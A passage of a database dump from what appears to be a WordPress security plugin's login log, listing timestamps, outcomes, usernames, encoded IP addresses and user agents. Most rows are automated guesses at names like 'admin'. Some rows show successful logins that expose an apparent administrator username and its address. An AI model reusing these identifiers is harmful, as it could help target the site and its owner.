Safari/537.36'),(19979,134337,1700065159.420976,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(20110,134751,1700237736.070769,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF699CE90C,'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12'),(20109,134744,1700231532.053512,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860D197,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(20108,134743,1700223802.871083,1,'loginFailInvalidUsername','greeceman',0,0x00000000000000000000FFFFB23E562C,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20107,134742,1700223747.532312,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD9B6AD0F,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20106,134741,1700223745.640853,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF323EB190,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20165,134889,1700374408.285964,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20166,134890,1700374408.617133,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19821,131662,1699338107.405986,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5762ADFC,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19822,131663,1699338271.863387,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF90CA13F3,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(20164,134888,1700374407.941313,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19956,133093,1699803073.832135,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19954,133083,1699795224.643553,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19955,133086,1699799143.574961,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19952,133067,1699787466.032849,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19953,133082,1699791327.199860,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19940,133023,1699760659.414758,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19941,133028,1699761492.739706,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19939,133022,1699760464.958445,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19938,133021,1699759600.323786,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19936,133019,1699752959.816534,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19937,133020,1699756803.360098,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19934,133012,1699749325.877017,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19935,133019,1699752959.814145,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19963,133116,1699827130.831578,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19962,133115,1699826634.961652,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19961,133102,1699816797.013587,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF056850F0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19960,133101,1699816794.842556,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF056850F0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19959,133096,1699811920.019619,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC11D6BFA,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19957,133094,1699807029.846774,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19958,133095,1699810991.123783,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19970,133731,1699921394.531049,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23EC0652,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19969,133730,1699921394.324547,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23EC0652,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19968,133729,1699916904.275238,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19967,133722,1699914566.936363,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19966,133710,1699893771.096218,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19965,133709,1699893770.380790,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19964,133708,1699893769.657779,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19983,134341,1700071020.217283,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19982,134340,1700070268.721448,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19915,132929,1699635361.937051,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19916,132930,1699635362.851370,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19950,133047,1699779750.007469,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19948,133041,1699775895.528697,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19949,133046,1699779516.678426,1,'loginFailInvalidUsername','famdav5',0,0x00000000000000000000FFFF879425BB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19947,133041,1699775895.526206,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19945,133038,1699772046.282170,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19946,133040,1699773268.012463,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D5B5FB5,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19942,133029,1699762001.441321,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19943,133030,1699764481.543148,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19944,133037,1699768251.657196,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19902,132285,1699466032.580623,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFF68F44844,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19901,132283,1699460166.338284,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19928,132995,1699712068.004791,1,'loginFailInvalidUsername','bhumm',0,0x00000000000000000000FFFF879425BB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19917,132931,1699635363.759042,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19951,133050,1699783613.426981,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19905,132291,1699478444.827821,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF68F44844,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(19906,132882,1699518366.168676,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67B299D9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19907,132883,1699518367.409365,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67B299D9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19908,132884,1699518368.470896,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67B299D9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19909,132885,1699526930.010005,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF2D3DBA12,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(19913,132915,1699599107.481670,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFD18D3863,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19912,132913,1699595498.345547,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF2D3DBC69,'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(19910,132887,1699549666.673244,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9566F415,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19911,132912,1699595497.893499,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFCDB97E2A,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0'),(19922,132937,1699637253.392375,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19923,132938,1699637254.911215,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(20105,134740,1700223693.848123,1,'loginFailInvalidUsername','wpcore',0,0x00000000000000000000FFFFC2958961,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20100,134731,1700198754.101079,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1B46CD9F,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(20101,134736,1700223547.141634,1,'loginFailInvalidUsername','stender',0,0x00000000000000000000FFFF7AA03D64,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20102,134737,1700223547.168500,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF7AA03D64,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20103,134738,1700223621.456573,1,'loginFailInvalidUsername','server',0,0x00000000000000000000FFFF29C1053C,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20104,134739,1700223621.498442,1,'loginFailInvalidUsername','bimak73555',0,0x00000000000000000000FFFF29C1053C,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(20099,134729,1700194661.342232,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20093,134708,1700183336.310695,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20094,134709,1700184032.538737,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20095,134710,1700184725.677399,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20096,134711,1700185416.728016,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20097,134712,1700186110.507363,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20098,134720,1700192232.496243,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20091,134706,1700181974.724351,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20092,134707,1700182656.063372,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20089,134705,1700181287.552046,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20090,134706,1700181974.721895,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20083,134697,1700179207.493479,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20084,134698,1700179903.673081,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20085,134698,1700179903.675615,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20086,134703,1700180559.632584,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20087,134704,1700180594.443301,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20088,134704,1700180594.445700,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20074,134689,1700175161.837806,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20075,134690,1700175835.963419,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20076,134691,1700176500.477276,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20077,134692,1700177167.668468,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20078,134692,1700177167.674476,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20079,134693,1700177839.106312,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20080,134694,1700177920.790775,1,'loginFailValidUsername','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20081,134695,1700177944.231201,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20082,134696,1700178527.014959,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20189,134920,1700397595.958875,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFFD06193DF,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(20188,134920,1700397595.955375,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFFD06193DF,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(20187,134919,1700395056.937501,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF8AC503AC,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(20186,134918,1700393295.442694,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF976A26A6,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(20182,134906,1700383411.667304,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA747EADE,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(20183,134907,1700383713.146187,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D8E6BB5,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(20184,134910,1700385858.376849,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF416DC1F8,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(20185,134915,1700388317.760906,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5CCC8A1C,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(20137,134850,1700328682.661564,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCB7C21D3,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(20136,134849,1700326251.041414,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF82B44B2A,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(20134,134848,1700325057.801230,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBD449164,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(20135,134848,1700325057.803758,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBD449164,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(20146,134860,1700348352.937259,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF679D1BC5,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(20145,134859,1700343405.435141,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9448D0C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(20144,134857,1700340933.853653,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF33440BE3,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(20143,134856,1700340602.867342,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20142,134855,1700338479.627814,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF05C407DC,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(20141,134854,1700336030.764289,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF33532A32,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(18277,107953,1691119302.147151,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFABED5DE6,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18276,107951,1691116878.679769,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(20113,134788,1700271116.947508,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5762ADFC,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(20111,134754,1700240122.054307,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20112,134782,1700248640.808601,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(20157,134881,1700373574.209102,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA7AC42BD,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(20156,134874,1700372286.226139,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C65913,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(20147,134861,1700350832.764885,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF45A3BA86,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(20148,134862,1700353331.196655,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF679ECEA7,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(20149,134863,1700355838.492314,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5762ADFC,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(20150,134865,1700360884.350396,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334D4254,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(20151,134866,1700363399.085545,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF327466D3,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(20152,134870,1700365940.403832,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2561E4BB,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(20153,134871,1700368495.504564,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF877D0109,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(20154,134872,1700371050.506214,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF33440BE3,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(20155,134873,1700372283.946304,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C65913,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(18278,107954,1691119306.150286,1,'loginFailInvalidUsername','webmaster1',0,0x00000000000000000000FFFFCB6E59CD,'Mozilla/5.0 (Linux; Android 12; SM-N970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18279,107955,1691119308.866031,1,'loginFailInvalidUsername','webmaster2',0,0x00000000000000000000FFFFB37D3312,'Mozilla/5.0 (Linux; Android 12; SM-G986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18280,107956,1691119310.710138,1,'loginFailInvalidUsername','show1',0,0x00000000000000000000FFFFA108B265,'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18281,107957,1691119312.584230,1,'loginFailInvalidUsername','show2',0,0x00000000000000000000FFFF71A1F385,'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.105 Mobile DuckDuckGo/5 Safari/537.36'),(20114,134789,1700273579.473727,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8B3BE898,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(18284,108037,1691141789.697486,1,'loginFailInvalidUsername','administrator1',0,0x00000000000000000000FFFF670CA05A,'Mozilla/5.0 (Linux; Android 11; IN2017) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18285,108038,1691141792.949221,1,'loginFailInvalidUsername','blogadmin1',0,0x00000000000000000000FFFF6772A672,'Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18286,108039,1691141795.831674,1,'loginFailInvalidUsername','blog',0,0x00000000000000000000FFFF29DE03DA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 